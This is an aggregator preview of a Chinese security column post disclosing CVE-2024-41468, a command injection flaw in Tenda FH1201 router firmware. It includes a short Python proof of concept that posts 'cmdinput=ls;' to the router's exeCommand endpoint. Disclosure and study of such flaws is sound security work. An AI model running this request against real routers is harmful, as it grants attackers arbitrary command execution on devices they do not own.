专栏名称: HACK之道
HACK之道,专注于红队攻防、实战技巧、CTF比赛、安全开发、安全运维、安全架构等精华技术文章及渗透教程、安全工具的分享。
今天看啥  ›  专栏  ›  HACK之道

CVE-2024-41468 POC

HACK之道  · 公众号  ·  · 2024-08-01 22:36
    

文章预览

Tenda-FH1201存在命令注入漏洞(CVE-2024-41468) Tenda FH1201 v1.2.0.14存在命令注入漏洞,位于exeCommand函数中,cmdinput参数未经任何过滤就被复制到栈空间v7中,然后执行,因此攻击者可以利用该漏洞执行任意命令 固件下载网站:https://www.tendacn.com/download/detail-3322.html poc import  requests ip =  '192.168.74.145' url =  f"http:// {ip} /goform/exeCommand" data =  "cmdinput=ls;" ret = requests.post(url=url,data=data) 漏洞来源 • https://github.com/iotresearch/iot-vuln/blob/main/Tenda/FH1201/exeCommand/README.md ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览